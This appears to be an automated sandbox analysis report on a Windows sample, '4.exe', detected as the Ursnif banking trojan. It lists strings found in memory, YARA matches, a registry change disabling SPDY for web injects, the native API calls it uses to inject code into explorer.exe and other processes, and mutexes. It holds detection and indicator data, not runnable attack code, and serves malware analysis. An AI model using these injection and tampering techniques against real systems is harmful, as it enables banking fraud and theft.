Source: RuntimeBroker.exe, 00000018.00000000.394678298.000001E764D02000.00000004.00000001.sdmp, String found in binary or memory: http://ns.adobp/
Source: RuntimeBroker.exe, 00000018.00000000.394678298.000001E764D02000.00000004.00000001.sdmp, String found in binary or memory: http://ns.micro/1
Source: explorer.exe, 0000000F.00000002.541023752.00000000053A0000.00000004.00000001.sdmp, String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: RuntimeBroker.exe, 00000018.00000002.526157992.000001E7675B6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000018.00000002.526121422.000001E76759F000.00000004.00000001.sdmp, String found in binary or memory: http://twitter.com/spotify:
Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: RuntimeBroker.exe, 00000018.00000002.526088508.000001E767538000.00000004.00000001.sdmp, String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: RuntimeBroker.exe, 00000018.00000002.526053578.000001E767517000.00000004.00000001.sdmp, String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_TermsnVersio
Source: RuntimeBroker.exe, 00000018.00000002.526088508.000001E767538000.00000004.00000001.sdmp, String found in binary or memory: http://www.g5e.com/termsofservice
Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 0000000F.00000000.379172849.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: explorer.exe, 0000000F.00000002.525161524.0000000003710000.00000004.00000001.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
            Source: explorer.exe, 0000000F.00000003.428010373.000000000EB97000.00000004.00000040.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
            Source: explorer.exe, 0000000F.00000002.541052132.00000000053C4000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
            Source: RuntimeBroker.exe, 00000018.00000002.526088508.000001E767538000.00000004.00000001.sdmpString found in binary or memory: https://instagram.com/hiddencity_

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Yara detected Ursnif
            Source: Yara match | File source: 0000000F.00000002.529092994.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000025.00000002.437630054.0000000002A2D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.392030682.00000000005DE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000012.00000002.392099343.00000232E0E6E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000025.00000003.435889269.0000000002650000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000003.347648132.000001ED61700000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000020.00000002.526191335.0000020E08F3E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000012.00000003.390938718.00000232E0DD0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000018.00000002.526900525.000001E76783E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.520597240.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001D.00000002.518229914.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY
            Source: Yara match | File source: Process Memory Space: control.exe PID: 1632, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4448, type: MEMORY
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4540, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY

            E-Banking Fraud:

            Yara detected Ursnif
            Source: Yara match | File source: 0000000F.00000002.529092994.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000025.00000002.437630054.0000000002A2D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000002.392030682.00000000005DE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000012.00000002.392099343.00000232E0E6E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000025.00000003.435889269.0000000002650000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000D.00000003.347648132.000001ED61700000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000020.00000002.526191335.0000020E08F3E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000012.00000003.390938718.00000232E0DD0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000018.00000002.526900525.000001E76783E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.520597240.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001D.00000002.518229914.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY
            Source: Yara match | File source: Process Memory Space: control.exe PID: 1632, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4448, type: MEMORY
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4540, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
            Disables SPDY (HTTP compression, likely to perform web injects)
            Source: C:\Windows\explorer.exe | Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
            Source: C:\Users\user\Desktop\4.exe | Code function: 0_2_020A390C GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA | 0_2_020A390C
            Source: C:\Users\user\Desktop\4.exe | Code function: 0_2_020A281E NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError | 0_2_020A281E
            Source: C:\Users\user\Desktop\4.exe | Code function: 0_2_020A2429 NtMapViewOfSection,RtlNtStatusToDosError | 0_2_020A2429
            Source: C:\Users\user\Desktop\4.exe | Code function: 0_2_020A4B3A memset,GetProcAddress,NtWow64QueryInformationProcess64 | 0_2_020A4B3A
            Source: C:\Users\user\Desktop\4.exe | Code function: 0_2_020A4E3B NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose | 0_2_020A4E3B
            Source: C:\Users\user\Desktop\4.exe | Code function: 0_2_020A4A6A NtQuerySystemInformation,RtlNtStatusToDosError | 0_2_020A4A6A
            Source: C:\Users\user\Desktop\4.exe | Code function: 0_2_020A2368 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError | 0_2_020A2368
            Source: C:\Users\user\Desktop\4.exe | Code function: 0_2_020A167A GetProcAddress,NtWow64ReadVirtualMemory64 | 0_2_020A167A
            Source: C:\Users\user\Desktop\4.exe | Code function: 0_2_020A2EAE memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,FindCloseChangeNotification,memset | 0_2_020A2EAE
            Source: C:\Users\user\Desktop\4.exe | Code function: 0_2_020A1AD5 NtCreateSection,memset,RtlNtStatusToDosError,NtClose | 0_2_020A1AD5
            Source: C:\Users\user\Desktop\4.exe | Code function: 0_2_020A285F memset,NtQueryInformationProcess | 0_2_020A285F
            Source: C:\Users\user\Desktop\4.exe | Code function: 0_2_020A1750 NtGetContextThread,NtGetContextThread | 0_2_020A1750
            Source: C:\Users\user\Desktop\4.exe | Code function: 0_2_020A52FC NtGetContextThread | 0_2_020A52FC
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005BD030 NtMapViewOfSection | 13_2_005BD030
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005B5080 NtAllocateVirtualMemory | 13_2_005B5080
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005BD148 NtQueryInformationProcess | 13_2_005BD148
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005B0C74 NtSetContextThread | 13_2_005B0C74
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005CDCE8 NtReadVirtualMemory | 13_2_005CDCE8
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005B84B8 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose | 13_2_005B84B8
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005AB688 NtWriteVirtualMemory | 13_2_005AB688
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005BB700 RtlAllocateHeap,NtCreateSection,NtUnmapViewOfSection,FindCloseChangeNotification | 13_2_005BB700
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005E1004 NtProtectVirtualMemory,NtProtectVirtualMemory | 13_2_005E1004
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B6D148 NtQueryInformationProcess | 15_2_03B6D148
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B65080 NtAllocateVirtualMemory | 15_2_03B65080
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B6D030 NtMapViewOfSection | 15_2_03B6D030
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B6B700 RtlAllocateHeap,NtCreateSection,NtUnmapViewOfSection,FindCloseChangeNotification | 15_2_03B6B700
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B5B688 NtWriteVirtualMemory | 15_2_03B5B688
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B52E38 RtlDeleteBoundaryDescriptor,RtlAllocateHeap,NtQuerySystemInformation | 15_2_03B52E38
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B54554 NtQueryInformationProcess | 15_2_03B54554
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B714A4 NtQueryInformationProcess,RtlDeleteBoundaryDescriptor | 15_2_03B714A4
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B7DCE8 NtReadVirtualMemory | 15_2_03B7DCE8
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B60C74 NtSetContextThread | 15_2_03B60C74
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E484B8 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose | 18_2_00000232E0E484B8
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E4D148 NtQueryInformationProcess | 18_2_00000232E0E4D148
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E71004 NtProtectVirtualMemory,NtProtectVirtualMemory | 18_2_00000232E0E71004
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 37_2_02A21E3F NtQueryInformationProcess | 37_2_02A21E3F
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 37_2_02A13B34 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose | 37_2_02A13B34
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 37_2_02A0CED5 NtMapViewOfSection,RtlNtStatusToDosError | 37_2_02A0CED5
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 37_2_02A068A2 NtUnmapViewOfSection,RtlNtStatusToDosError,HeapFree | 37_2_02A068A2
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 37_2_02A20CC4 memset,NtQueryInformationProcess | 37_2_02A20CC4
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 37_2_02A16C33 memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,CloseHandle,memset | 37_2_02A16C33
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 37_2_02A0D9ED NtQuerySystemInformation,RtlNtStatusToDosError | 37_2_02A0D9ED
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 37_2_02A0CD70 NtCreateSection,memset,RtlNtStatusToDosError,NtClose | 37_2_02A0CD70
            Source: C:\Users\user\Desktop\4.exe | Code function: 0_2_020A5348 | 0_2_020A5348
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005C7880 | 13_2_005C7880
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005C94B4 | 13_2_005C94B4
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005BB700 | 13_2_005BB700
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005CA044 | 13_2_005CA044
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005B4064 | 13_2_005B4064
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005BF064 | 13_2_005BF064
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005B1004 | 13_2_005B1004
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005B80FC | 13_2_005B80FC
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005B7088 | 13_2_005B7088
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005B6908 | 13_2_005B6908
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005B9108 | 13_2_005B9108
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005AE124 | 13_2_005AE124
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005AE9C0 | 13_2_005AE9C0
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005BA9C4 | 13_2_005BA9C4
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005BEAE8 | 13_2_005BEAE8
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005B72E4 | 13_2_005B72E4
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005BFA94 | 13_2_005BFA94
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005B2378 | 13_2_005B2378
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005B5318 | 13_2_005B5318
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005AEBC8 | 13_2_005AEBC8
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005AD3F8 | 13_2_005AD3F8
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005C53EC | 13_2_005C53EC
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005BD398 | 13_2_005BD398
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005BC390 | 13_2_005BC390
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005AABA8 | 13_2_005AABA8
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005C6468 | 13_2_005C6468
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005A7C00 | 13_2_005A7C00
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005ABC9C | 13_2_005ABC9C
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005A148C | 13_2_005A148C
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005A3CAC | 13_2_005A3CAC
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005CA550 | 13_2_005CA550
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005B5D14 | 13_2_005B5D14
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005A35E8 | 13_2_005A35E8
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005AE67C | 13_2_005AE67C
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005CD664 | 13_2_005CD664
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005CF604 | 13_2_005CF604
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005AC6E4 | 13_2_005AC6E4
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005A8688 | 13_2_005A8688
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005AA684 | 13_2_005AA684
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005B4768 | 13_2_005B4768
            Source: C:\Windows\System32\control.exe | Code function: 13_2_005A9F1C | 13_2_005A9F1C
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B5ABA8 | 15_2_03B5ABA8
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B6C390 | 15_2_03B6C390
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B5D3F8 | 15_2_03B5D3F8
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B5E9C0 | 15_2_03B5E9C0
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B5E124 | 15_2_03B5E124
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B7A044 | 15_2_03B7A044
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B6B700 | 15_2_03B6B700
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B5A684 | 15_2_03B5A684
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B53CAC | 15_2_03B53CAC
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B5BC9C | 15_2_03B5BC9C
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B6D398 | 15_2_03B6D398
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B753EC | 15_2_03B753EC
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B5EBC8 | 15_2_03B5EBC8
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B65318 | 15_2_03B65318
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B62378 | 15_2_03B62378
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B6FA94 | 15_2_03B6FA94
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B672E4 | 15_2_03B672E4
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B6EAE8 | 15_2_03B6EAE8
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B71A78 | 15_2_03B71A78
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B6A9C4 | 15_2_03B6A9C4
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B66908 | 15_2_03B66908
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B69108 | 15_2_03B69108
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B67088 | 15_2_03B67088
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B680FC | 15_2_03B680FC
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B61004 | 15_2_03B61004
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B6F064 | 15_2_03B6F064
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B64064 | 15_2_03B64064
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B59F1C | 15_2_03B59F1C
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B64768 | 15_2_03B64768
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B58688 | 15_2_03B58688
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B5C6E4 | 15_2_03B5C6E4
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B7F604 | 15_2_03B7F604
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B5E67C | 15_2_03B5E67C
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B7D664 | 15_2_03B7D664
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B535E8 | 15_2_03B535E8
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B65D14 | 15_2_03B65D14
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B7A550 | 15_2_03B7A550
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B794B4 | 15_2_03B794B4
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B5148C | 15_2_03B5148C
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B57C00 | 15_2_03B57C00
            Source: C:\Windows\explorer.exe | Code function: 15_2_03B76468 | 15_2_03B76468
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E594B4 | 18_2_00000232E0E594B4
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E57880 | 18_2_00000232E0E57880
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E3BC9C | 18_2_00000232E0E3BC9C
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E33CAC | 18_2_00000232E0E33CAC
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E3148C | 18_2_00000232E0E3148C
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E56468 | 18_2_00000232E0E56468
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E3D3F8 | 18_2_00000232E0E3D3F8
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E37C00 | 18_2_00000232E0E37C00
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E335E8 | 18_2_00000232E0E335E8
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E5A550 | 18_2_00000232E0E5A550
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E45D14 | 18_2_00000232E0E45D14
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E3C6E4 | 18_2_00000232E0E3C6E4
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E3E67C | 18_2_00000232E0E3E67C
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E3A684 | 18_2_00000232E0E3A684
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E38688 | 18_2_00000232E0E38688
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E5D664 | 18_2_00000232E0E5D664
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E5F604 | 18_2_00000232E0E5F604
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E44768 | 18_2_00000232E0E44768
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E39F1C | 18_2_00000232E0E39F1C
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E4B700 | 18_2_00000232E0E4B700
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E47088 | 18_2_00000232E0E47088
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E44064 | 18_2_00000232E0E44064
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E4F064 | 18_2_00000232E0E4F064
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E5A044 | 18_2_00000232E0E5A044
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E41004 | 18_2_00000232E0E41004
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E3E9C0 | 18_2_00000232E0E3E9C0
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E4A9C4 | 18_2_00000232E0E4A9C4
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E3E124 | 18_2_00000232E0E3E124
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E480FC | 18_2_00000232E0E480FC
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E46908 | 18_2_00000232E0E46908
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E49108 | 18_2_00000232E0E49108
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E4EAE8 | 18_2_00000232E0E4EAE8
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E472E4 | 18_2_00000232E0E472E4
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E4FA94 | 18_2_00000232E0E4FA94
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E553EC | 18_2_00000232E0E553EC
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E3EBC8 | 18_2_00000232E0E3EBC8
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E4D398 | 18_2_00000232E0E4D398
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E3ABA8 | 18_2_00000232E0E3ABA8
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E42378 | 18_2_00000232E0E42378
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E4C390 | 18_2_00000232E0E4C390
            Source: C:\Windows\System32\rundll32.exe | Code function: 18_2_00000232E0E45318 | 18_2_00000232E0E45318
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 37_2_02A23678 | 37_2_02A23678
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 37_2_02A0A30F | 37_2_02A0A30F
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 37_2_02A0B34F | 37_2_02A0B34F
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 37_2_02A0C8A6 | 37_2_02A0C8A6
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 37_2_02A03C82 | 37_2_02A03C82
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 37_2_02A08038 | 37_2_02A08038
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 37_2_02A1092F | 37_2_02A1092F
            Source: 4.exe, 00000000.00000003.346569846.0000000003164000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 4.exe
            Source: C:\Windows\explorer.exe | Section loaded: cryptdlg.dll
            Source: C:\Windows\explorer.exe | Section loaded: msimg32.dll
            Source: classification engine | Classification label: mal100.bank.troj.spyw.evad.winEXE@26/11@10/1
            Source: C:\Windows\SysWOW64\cmd.exe | Code function: 37_2_02A01492 CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,Thread32Next | 37_2_02A01492
            Source: C:\Users\user\Desktop\4.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\AppXtcse
            Source: C:\Windows\SysWOW64\cmd.exe | Mutant created: \Sessions\1\BaseNamedObjects\{13E4E2B9-561A-BD8D-F8F7-EA41AC1BBE05}
            Source: C:\Windows\System32\control.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\{65826E82-80D0-DF89-B269-B48306AD2867}
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7016:120:WilError_01
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_01
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7076:120:WilError_01
            Source: C:\Windows\System32\control.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\{EB412D51-4EEE-5521-B04F-6259E4F3B69D}
